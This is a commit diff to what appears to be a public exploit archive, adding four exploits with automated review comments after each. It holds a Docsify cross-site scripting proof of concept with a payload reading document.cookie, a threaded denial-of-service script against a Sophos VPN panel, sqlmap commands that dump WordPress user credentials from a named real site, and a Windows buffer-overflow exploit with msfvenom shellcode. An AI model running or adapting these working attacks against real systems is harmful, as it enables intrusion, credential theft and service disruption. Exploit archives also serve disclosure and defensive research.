DB: 2020-07-23
4 changes to exploits/shellcodes NetPCLinker 1.0.0.0 - Buffer Overflow (SEH Egghunter) Docsify.js 4.11.4 - Reflective Cross-Site Scripting WordPress Theme NexosReal Estate 1.7 - 'search_order' SQL Injection Sophos VPN Web Panel 2020 - Denial of Service (Poc)
This commit is contained in:
parent
bd3d5964fc
commit
67c1f99f41
5 changed files with 284 additions and 0 deletions
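--- a/exploits/multiple/webapps/48681.txt
+++ b/exploits/multiple/webapps/48681.txt
@@ -0,0 +1,66 @@
+# Exploit Title: Docsify.js 4.11.4 - Reflective Cross-Site Scripting
+# Date: 2020-06-22
+# Exploit Author: Amin Sharifi
+# Vendor Homepage: https://docsify.js.org
+# Software Link: https://github.com/docsifyjs/docsify
+# Version: 4.11.4
+# Tested on: Windows 10
+# CVE : CVE-2020-7680
+
+
+docsify.js uses fragment identifiers (parameters after # sign) to load
+resources from server-side .md files. it then renders the .md file inside
+the HTML page.
+
+For example : https://docsify.js.org/#/quickstart sends an ajax to
+https://docsify.js.org/quickstart.md and renders it inside the html page.
+
+due to lack of validation it is possible to provide external URLs after the
+/#/ and render arbitrary javascript/HTML inside the page which leads to
+DOM-based Cross Site Scripting (XSS).
+
+
+Steps to reproduce:
+
+step 1. setup a server (for example I use flask here, for the POC im
+hosting one on https://asharifi.pythonanywhere.com )
+
+step 2. the server should respond to request to /README.md with a crafted
+XSS payload. here is the payload "Html Injection and XSS PoC</p><img src=1
+onerror=alert(1)><img src=1 onerror=alert(document.cookie)><p>"
+also the CORS should be set so that other Origins would be able to send
+ajax requests to the server so Access-Control-Allow-Origin must be set to *
+(or to the specific domain that you wanna exploit) example code below:
+
+-------------------------------------------------
+from flask import Flask
+import flask
+
+app = Flask(__name__)
+
+
+@app.route('/README.md')
+def inject():
+resp = flask.Response("Html Injection and XSS PoC</p><img src=1
+onerror=alert(1)><img src=1 onerror=alert(document.cookie)><p>")
+resp.headers['Access-Control-Allow-Origin'] = '*'
+return resp
+
+------------------------------------------------------
+step 3. craft the link for execution of the exploit
+for example for https://docsify.js.org website you can create the link as
+below
+
+https://docsify.js.org/#//asharifi.pythonanywhere.com/README
+(note that the mentioned domain is no longer vulnerable at the time writing
+this report)
+
+when a user visits this URL an ajax request will be sent to
+asharifi.pythonanywhere.com/README.md and the response of the request will
+be rendered inside the webpage which results in XSS payload being executed
+on the page.
+
+
+snyk advisory: https://snyk.io/vuln/SNYK-JS-DOCSIFY-567099
+Mitre CVE entry:
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-7680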
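Review bot: The title classifies this as "Reflective Cross-Site Scripting" while the body's own analysis, in the paragraph ending `DOM-based Cross Site Scripting (XSS)`, says the payload is fetched and rendered by client-side code driven by the fragment identifier; the two labels should agree, because the index entry built from the title is what defenders search for. Either retitle it `# Exploit Title: Docsify.js 4.11.4 - DOM-Based Cross-Site Scripting` or add a sentence under the CVE line explaining why the author treats it as reflected. The advisory gives the affected version but no fixed release; a line such as `# Fixed in: <fixed version>` beside the CVE line would make it actionable for anyone triaging from the index.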
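--- a/exploits/multiple/webapps/48683.py
+++ b/exploits/multiple/webapps/48683.py
@@ -0,0 +1,99 @@
+# Exploit Title: Sophos VPN Web Panel 2020 - Denial of Service (Poc)
+# Date: 2020-06-17
+# Exploit Author: Berk KIRAS
+# Vendor Homepage: https://www.sophos.com/
+# Version:2020 Web Panel
+# Tested on: Apache
+# Berk KIRAS PwC - Cyber Security Specialist
+# Sophos VPN Web Portal Denial of Service Vulnerability
+# System parse JSON data. If we want to send some JSON with invalid data format
+# for ex. valid -> {"test","test2"} , invalid -> {"test",PAYLOAD"test2"}
+# The system can not parse this data fastly and service down
+# payload_option2 ="../../../../../../../../../FILE./FILE"
+
+#!/usr/bin/python3
+
+import requests
+import sys
+import random
+import threading
+
+def send_req():
+cnt = random.randint(9,22)
+payload= "../"*cnt+'{FILE}'
+my_datas_params = {"username":"test",
+payload+"password":"admin",
+"cookie":"0",
+"submit":"<div class=\"login_screen_login_button_left\"></div><div class=\"login_screen_login_button_middle\">Oturum Aç</div><div class=\"login_screen_login_button_right\"></div>",
+"language":"turkish",
+"browser_id":"kbgacsyo-q4j5o7lr70e"}
+
+# You should change some values into the headers
+Host_addr = sys.argv[2]
+Origin=sys.argv[1]+"://"+sys.argv[2]
+Referrer=sys.argv[1]+"://"+sys.argv[2]
+Cookie=sys.argv[4]
+#Headers
+my_datas_headers ={
+"Host":str(Host_addr),
+"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:77.0) Gecko/20100101 Firefox/77.0",
+"Accept": "text/javascript, text/html, application/xml, text/xml, */*",
+"Accept-Language": "tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3",
+"Accept-Encoding": "gzip, deflate",
+"X-Requested-With": "XMLHttpRequest",
+"X-Prototype-Version": "1.6.1_rc3",
+"Content-type": "application/json; charset=UTF-8",
+"Origin":Origin,
+"Connection": "close",
+"Referer":Referrer,
+"Cookie":Cookie,
+}
+my_datas_headers2 ={
+"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:77.0) Gecko/20100101 Firefox/77.0",
+"Accept": "text/javascript, text/html, application/xml, text/xml, */*",
+"Accept-Language": "tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3",
+"Accept-Encoding": "gzip, deflate",
+"X-Requested-With": "XMLHttpRequest",
+"X-Prototype-Version": "1.6.1_rc3",
+"Content-type": "application/json; charset=UTF-8",
+"Connection": "close",
+}
+#If you want to edit and add headers some headers added
+s = requests.session()
+#if you want simple-> headers={'User-Agent': 'Mozilla', 'Accept-Encoding': 'gzip, deflate', 'Accept': '*/*', 'Connection': 'keep-alive'}
+s.headers.update(my_datas_headers2)
+print(s.headers.items)
+r = s.post(sys.argv[1]+"://"+sys.argv[2]+sys.argv[3],data=my_datas_params)
+
+return s
+
+def main():
+if(len(sys.argv) < 6):
+print("Usage:1) Implement your headers \n2)change payload if you want \n3) exploit.py <http/https> <domain> <page> <cookie-val> <Thread(1-10)> \nExample-> exploit.py http vpn.test.com /test/index.plx 2\nCoded by b3rkk1r4s | PwC Cyber")
+sys.exit(0)
+else:
+try:
+req_count=0
+while(True):
+if(int(sys.argv[5])==1):
+resp = send_req()
+req_count=req_count+1
+print("Sending Requests... Count: "+str(req_count))
+else:
+threads = int(sys.argv[5])
+jobs = []
+for i in range(0, threads):
+out_list = list()
+thread = threading.Thread(target=send_req)
+jobs.append(thread)
+for j in jobs:
+j.start()
+print("Jobs Started!")
+# Ensure all of the threads have finished
+for j in jobs:
+j.join()
+
+except Exception:
+print(Exception)
+
+main()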
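Review bot: The header comment says the service falls over on malformed JSON, but send_req() never sends JSON: the request goes out as `data=my_datas_params`, i.e. a form-encoded body, and the `my_datas_headers` dict (Host, Origin, Referer and the Cookie read from sys.argv[4]) is built and then never applied — only `my_datas_headers2` reaches the session. The description should match what the script does; replacing the JSON sentences with `# NOTE: the body is sent form-encoded (data=), not as JSON; my_datas_headers is constructed but never applied` would stop readers from assuming a JSON parser is the affected component. The usage string's example (`exploit.py http vpn.test.com /test/index.plx 2`) omits the `<cookie-val>` argument that the `len(sys.argv) < 6` check requires, so the documented example fails the script's own argument check. Indentation was lost when this page was rendered, so the nesting of the try/while/if blocks in main() is inferred rather than visible.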
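--- a/exploits/php/webapps/48682.txt
+++ b/exploits/php/webapps/48682.txt
@@ -0,0 +1,53 @@
+# Exploit Title: WordPress Theme NexosReal Estate 1.7 - 'search_order' SQL Injection
+# Google Dork: inurl:/wp-content/themes/nexos/
+# Date: 2020-06-17
+# Exploit Author: Vlad Vector
+# Vendor: Sanljiljan [ https://themeforest.net/user/sanljiljan ]
+# Software Version: 1.7
+# Software Link: https://themeforest.net/item/nexos-real-estate-agency-directory/21126242
+# Tested on: Debian 10
+# CVE: CVE-2020-15363, CVE-2020-15364
+# CWE: CWE-79, CWE-89
+
+
+
+### [ Info: ]
+
+[i] The Nexos theme through 1.7 for WordPress allows side-map/?search_order= SQL Injection.
+
+
+
+### [ Vulnerabilities: ]
+
+[x] Unauthenticated Reflected XSS
+[x] SQL Injection
+
+
+
+### [ PoC Unauthenticated Reflected XSS: ]
+
+[!] TARGET/TARGET-DIR/top-map/?search_order=idlisting DESC&search_location="><img src=x onerror=alert(`VLΛDVΞCTOR`);window.location=`https://twitter.com/vlad_vector`%3E>
+
+[!] GET /TARGET-DIR/top-map/?search_order=idlisting%20DESC&search_location=%22%3E%3Cimg%20src=x%20onerror=alert(`VL%CE%9BDV%CE%9ECTOR`);window.location=`https://twitter.com/vlad_vector`%3E%3E HTTP/1.1
+Host: listing-themes.com
+
+
+
+### [ PoC SQL Injection: ]
+
+[!] sqlmap --url="TARGET/TARGET-DIR/side-map/?search_order=idlisting%20DESC" -dbs --random-agent --threads 4
+
+[02:23:33] [INFO] the back-end DBMS is MySQL
+[02:23:33] [INFO] fetching database names
+[02:23:33] [INFO] fetching number of databases
+[02:23:33] [INFO] resumed: 2
+available databases [2]:
+[*] geniuscr_nexos
+[*] information_schema
+
+[!] sqlmap --url="TARGET/TARGET-DIR/side-map/?search_order=idlisting%20DESC" -D geniuscr_nexos -T wp_users -C user_login,user_pass,user_email --random-agent --threads 8
+
+Database: TARGET-DB
+Table: wp_users
+[9 entries]
++--------------+------------------------------------+-------------------------+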
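Review bot: The SQL-injection section names a live third-party backend — `Host: listing-themes.com` in the XSS request, `[*] geniuscr_nexos` in the sqlmap output, and the same name reused in the `-D geniuscr_nexos` command — while the rest of the advisory uses `TARGET`/`TARGET-DIR` and `Database: TARGET-DB` placeholders. Substituting placeholders there too (`Host: TARGET`, `[*] TARGET-DB`, `-D TARGET-DB`) keeps the advisory from identifying a specific site's database. The header lists two CVEs and two CWEs together without saying which belongs to the reflected XSS and which to the SQL injection; one `# CVE:` line per vulnerability, each naming its CWE, would make the index entry unambiguous.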
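--- a/exploits/windows/local/48680.py
+++ b/exploits/windows/local/48680.py
@@ -0,0 +1,62 @@
+# Exploit Title: NetPCLinker 1.0.0.0 - Buffer Overflow (SEH Egghunter)
+# Date: 2019-06-28
+# Exploit Author: Saeed reza Zamanian
+# Vendor Homepage: https://sourceforge.net/projects/netpclinker/
+# Software Link: https://sourceforge.net/projects/netpclinker/files/
+# Version: 1.0.0.0
+# Tested on: Windows Vista SP1
+
+#!/usr/bin/python
+
+'''
+# Replicate Crash:
+1) Install and Run the application
+2) Go to second tab "Clients Control Panel"
+3) Press Add button
+4) Run the exploit , the exploit creates a text file named payload.txt
+5) Copy payload.txt contents into the add client dialog , "DNS/IP" field
+6) Press OK . Your shellcode will be executed by pressing OK button.
+
+'''
+
+#msfvenom -p windows/exec CMD=calc -f c -b "\x00\x0a\x0d\x33\x35\x36"
+#Bad Characters : \x0a\x0d\x33\x35\x36
+
+shellcode = (
+"\xdb\xc4\xd9\x74\x24\xf4\x5b\xbe\x9a\x32\x43\xd2\x31\xc9\xb1"
+"\x30\x83\xc3\x04\x31\x73\x14\x03\x73\x8e\xd0\xb6\x2e\x46\x96"
+"\x39\xcf\x96\xf7\xb0\x2a\xa7\x37\xa6\x3f\x97\x87\xac\x12\x1b"
+"\x63\xe0\x86\xa8\x01\x2d\xa8\x19\xaf\x0b\x87\x9a\x9c\x68\x86"
+"\x18\xdf\xbc\x68\x21\x10\xb1\x69\x66\x4d\x38\x3b\x3f\x19\xef"
+"\xac\x34\x57\x2c\x46\x06\x79\x34\xbb\xde\x78\x15\x6a\x55\x23"
+"\xb5\x8c\xba\x5f\xfc\x96\xdf\x5a\xb6\x2d\x2b\x10\x49\xe4\x62"
+"\xd9\xe6\xc9\x4b\x28\xf6\x0e\x6b\xd3\x8d\x66\x88\x6e\x96\xbc"
+"\xf3\xb4\x13\x27\x53\x3e\x83\x83\x62\x93\x52\x47\x68\x58\x10"
+"\x0f\x6c\x5f\xf5\x3b\x88\xd4\xf8\xeb\x19\xae\xde\x2f\x42\x74"
+"\x7e\x69\x2e\xdb\x7f\x69\x91\x84\x25\xe1\x3f\xd0\x57\xa8\x55"
+"\x27\xe5\xd6\x1b\x27\xf5\xd8\x0b\x40\xc4\x53\xc4\x17\xd9\xb1"
+"\xa1\xe8\x93\x98\x83\x60\x7a\x49\x96\xec\x7d\xa7\xd4\x08\xfe"
+"\x42\xa4\xee\x1e\x27\xa1\xab\x98\xdb\xdb\xa4\x4c\xdc\x48\xc4"
+"\x44\xbf\x0f\x56\x04\x40"
+)
+
+egghunter = "\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74\xef\xb8\x52\x65\x7a\x61\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7"
+nSEH = '\xEB\xAA\x90\x90' #Jump Back
+
+# (Vista)
+# PPR(ecx) : 0x00494b67 : startnull,asciiprint,ascii,alphanum {PAGE_EXECUTE_READ} [NPL.exe]
+# ASLR: False, Rebase: False, SafeSEH: False, OS: False, v1.0.0.0 (C:\Program Files\NetPCLinker\NPL.exe)
+
+SEH = '\x67\x4b\x49'
+offset = "RezaReza"+shellcode +'\x41'*(1199-8-len(shellcode)-len(egghunter)-50)
+
+payload = offset+egghunter+"\x90"*50+nSEH+SEH
+
+try:
+f=open("payload.txt","w")
+print("[+] Creating %s bytes payload." %len(payload))
+f.write(payload)
+f.close()
+print("[+] File created!")
+except:
+print("File cannot be created.")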
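Review bot: The file-writing block at the end of the file uses a bare `except:` that catches everything, including KeyboardInterrupt, and reports only "File cannot be created." with no cause, and the open/write/close sequence leaks the handle if `write` raises. `with open("payload.txt", "w") as f:` around the write plus `except OSError as exc: print("File cannot be created: %s" % exc)` covers the I/O failures the author meant to handle without hiding anything else. The `#!/usr/bin/python` on line 9 of the file sits after the header comments, so it is an ordinary comment rather than a shebang; the header should state the interpreter this script is meant for, e.g. `# Interpreter: <python version>`, since whether `payload` is written as raw bytes or re-encoded depends on the interpreter — confirm which was used.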
|
@ -11122,6 +11122,7 @@ id,file,description,date,author,type,platform,port
|
|||
48644,exploits/hardware/local/48644.c,"Sony Playstation 4 (PS4) < 7.02 / FreeBSD 9 / FreeBSD 12 - 'ip6_setpktopt' Kernel Local Privilege Escalation (PoC)",2020-03-21,TheFloW,local,hardware,
|
||||
48677,exploits/windows/local/48677.txt,"Sonar Qube 8.3.1 - 'SonarQube Service' Unquoted Service Path",2020-07-17,"Velayutham Selvaraj",local,windows,
|
||||
48678,exploits/windows/local/48678.py,"Simple Startup Manager 1.17 - 'File' Local Buffer Overflow (PoC)",2020-07-17,PovlTekstTV,local,windows,
|
||||
48680,exploits/windows/local/48680.py,"NetPCLinker 1.0.0.0 - Buffer Overflow (SEH Egghunter)",2020-07-22,"Saeed reza Zamanian",local,windows,
|
||||
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
|
||||
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
|
||||
5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
|
||||
|
@ -42926,3 +42927,6 @@ id,file,description,date,author,type,platform,port
|
|||
48674,exploits/php/webapps/48674.txt,"Infor Storefront B2B 1.0 - 'usr_name' SQL Injection",2020-07-15,ratboy,webapps,php,
|
||||
48676,exploits/lua/webapps/48676.txt,"Wing FTP Server 6.3.8 - Remote Code Execution (Authenticated)",2020-07-16,V1n1v131r4,webapps,lua,
|
||||
48679,exploits/php/webapps/48679.txt,"CMSUno 1.6 - Cross-Site Request Forgery (Change Admin Password)",2020-07-17,Noth,webapps,php,
|
||||
48681,exploits/multiple/webapps/48681.txt,"Docsify.js 4.11.4 - Reflective Cross-Site Scripting",2020-07-22,"Amin Sharifi",webapps,multiple,
|
||||
48682,exploits/php/webapps/48682.txt,"WordPress Theme NexosReal Estate 1.7 - 'search_order' SQL Injection",2020-07-22,"Vlad Vector",webapps,php,
|
||||
48683,exploits/multiple/webapps/48683.py,"Sophos VPN Web Panel 2020 - Denial of Service (Poc)",2020-07-22,"Berk KIRAS",webapps,multiple,
|
||||
|
|